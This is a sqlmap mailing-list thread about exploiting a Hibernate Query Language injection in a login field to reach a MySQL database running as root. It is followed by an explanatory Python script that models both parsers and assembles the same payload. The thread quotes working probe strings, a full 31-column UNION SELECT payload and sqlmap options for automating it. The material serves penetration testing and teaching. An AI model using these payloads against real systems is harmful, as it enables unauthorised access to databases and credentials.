Re: [sqlmap-users] injecting into MySQL through HQL
From: Chris O. <chr...@gm...> - 2017-02-24 23:23:40
I *think* (going from memory here) that it's higher than that by default. There's also the --union-cols=30-40, so you should be good.

On 24 February 2017 at 18:17, Robin Wood <ro...@di...nja> wrote:

> I hadn't tried the custom injection point, I'll give that a try. Do you
> know the maximum number of fields the union will do? I was thinking about it
> after shutting the machine down and think it's 30, so I will need to increase that.
>
> Robin
>
> On Fri, 24 Feb 2017, 23:14 Chris Oakley, <chr...@gm...> wrote:
>
>> I assume you've tried * for custom injection point and --technique=U?
>>
>> Whether or not it'll dance with HQL is another question entirely.
>>
>> On 24 February 2017 at 16:44, Robin Wood <ro...@di...nja> wrote:
>>
>> I've just found an instance of Hibernate Query Language injection that
>> lets me get at an underlying MySQL database if I inject in the right way.
>> Some examples I've got are:
>>
>> loginName=a - works and gives 200
>> loginName=' - fails with HQL error and 500
>> loginName=a' or 'a'='a - works and gives 200
>> loginName=a\'' - gets through HQL and then generates a MySQL error in a
>> where clause. The injection gets converted to where NAME='a\'''
>>
>> With some playing I've found that this is a valid injection and they are
>> running as root, as I get a 500 back when I supply root and a 200 when I give
>> something else.
>>
>> loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10,
>> 11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01"
>> from users where user()="root@localhost" -- '='1
>>
>> The 500 is because some of the stuff from the union isn't being handled
>> correctly by the page; the 200 is because the union doesn't return any data,
>> so the first bit (basically a=a) is returning valid data and getting through
>> the rest of the parsing.
>>
>> So I think what I need to do is to tell SQLMap that it is a union
>> injection with 31 fields and that the injection needs to go into here:
>>
>> loginName=a' and 'a\''="a" <INJECT> -- '='1
>>
>> Can I do this?
>>
>> I've got all this set up and running in Burp so I can test things out if
>> anyone needs me to.
>>
>> Robin
>>
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
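The parser mismatch Robin describes above (a\'' getting through HQL but breaking MySQL, and the final 31-column union payload) can be reproduced with a small model of the two tokenisers. This is an added example, not code from the thread's authors, from sqlmap or from Hibernate; the two escaping rule sets, the shape of the vulnerable concatenation (NAME='...') and the assumption that Hibernate copies the literal text into the generated SQL verbatim (which is what the observed NAME='a\''' shows) are all assumptions made for the illustration.

```python
"""Model of how HQL and MySQL each tokenise the same WHERE clause.

Added example; not code from sqlmap, Hibernate or the thread's authors.
The two rule sets are a deliberately minimal model (an assumption):
  HQL   : only '' escapes a quote inside a literal, backslash is ordinary.
  MySQL : both '' and \\' escape a quote, "..." is also a string literal,
          and "-- " starts a comment that runs to end of input.
The literal text is assumed to reach MySQL unchanged, as NAME='a\\''' shows.
"""

HQL = {"quotes": "'", "backslash_escapes": False, "line_comment": None}
MYSQL = {"quotes": "'\"", "backslash_escapes": True, "line_comment": "-- "}


def tokenize(text, dialect):
    """Split `text` into (kind, chunk) pairs, kind in {"code", "string",
    "unterminated", "comment"}. String chunks keep their quotes."""
    tokens = []
    i, n, code_start = 0, len(text), 0
    while i < n:
        lc = dialect["line_comment"]
        if lc and text.startswith(lc, i):          # rest of input is a comment
            if i > code_start:
                tokens.append(("code", text[code_start:i]))
            tokens.append(("comment", text[i:]))
            return tokens
        c = text[i]
        if c not in dialect["quotes"]:
            i += 1
            continue
        if i > code_start:
            tokens.append(("code", text[code_start:i]))
        quote, start, closed = c, i, False
        i += 1
        while i < n:
            ch = text[i]
            if dialect["backslash_escapes"] and ch == "\\" and i + 1 < n:
                i += 2                              # \x is one escaped character
            elif ch == quote and i + 1 < n and text[i + 1] == quote:
                i += 2                              # doubled quote is an escaped quote
            elif ch == quote:
                i += 1                              # closing quote
                closed = True
                break
            else:
                i += 1
        tokens.append(("string" if closed else "unterminated", text[start:i]))
        code_start = i
    if code_start < n:
        tokens.append(("code", text[code_start:]))
    return tokens


def code_view(text, dialect):
    """What the dialect's parser sees as keywords/operators, i.e. outside literals."""
    return "".join(chunk for kind, chunk in tokenize(text, dialect) if kind == "code")


def is_unterminated(text, dialect):
    """True when the dialect hits end of input inside a string literal (syntax error)."""
    return any(kind == "unterminated" for kind, _ in tokenize(text, dialect))


def where_clause(login_name):
    """The vulnerable concatenation implied by the thread (assumed shape)."""
    return "NAME='" + login_name + "'"


def union_select(n_cols, overrides):
    """'union select c1,...,cN': column i (1-based) defaults to its number,
    `overrides` replaces chosen positions (e.g. date-typed columns)."""
    cols = [overrides.get(i, str(i)) for i in range(1, n_cols + 1)]
    return "union select " + ",".join(cols)


def payload(n_cols=31, overrides=None):
    """Robin's payload shape: an escape only HQL honours, the union, then a
    MySQL comment that swallows the trailing ' Hibernate appends."""
    if overrides is None:
        overrides = {1: "@@version", 27: '"2001-01-01"', 30: '"2001-01-01"', 31: '"2001-01-01"'}
    return ("a' and 'a\\''=\"a\" " + union_select(n_cols, overrides)
            + " from users where user()=\"root@localhost\" -- '='1")


if __name__ == "__main__":
    for name in ["a", "'", "a' or 'a'='a", "a\\''", payload()]:
        clause = where_clause(name)
        print(repr(name))
        for label, d in (("HQL  ", HQL), ("MySQL", MYSQL)):
            seen = ("syntax error (unterminated literal)" if is_unterminated(clause, d)
                    else code_view(clause, d))
            print("  ", label, "->", seen)
```

Running the script prints, for each of the thread's four probes and the full payload, what each parser sees outside string literals: HQL sees the whole union as one harmless literal followed by ='1', while MySQL closes the literal at \' and sees a bare union select before the -- comment. The union_select helper is where the <INJECT> position from the thread would sit when building a payload by hand; sqlmap's * marker and --union-cols are the automated equivalent.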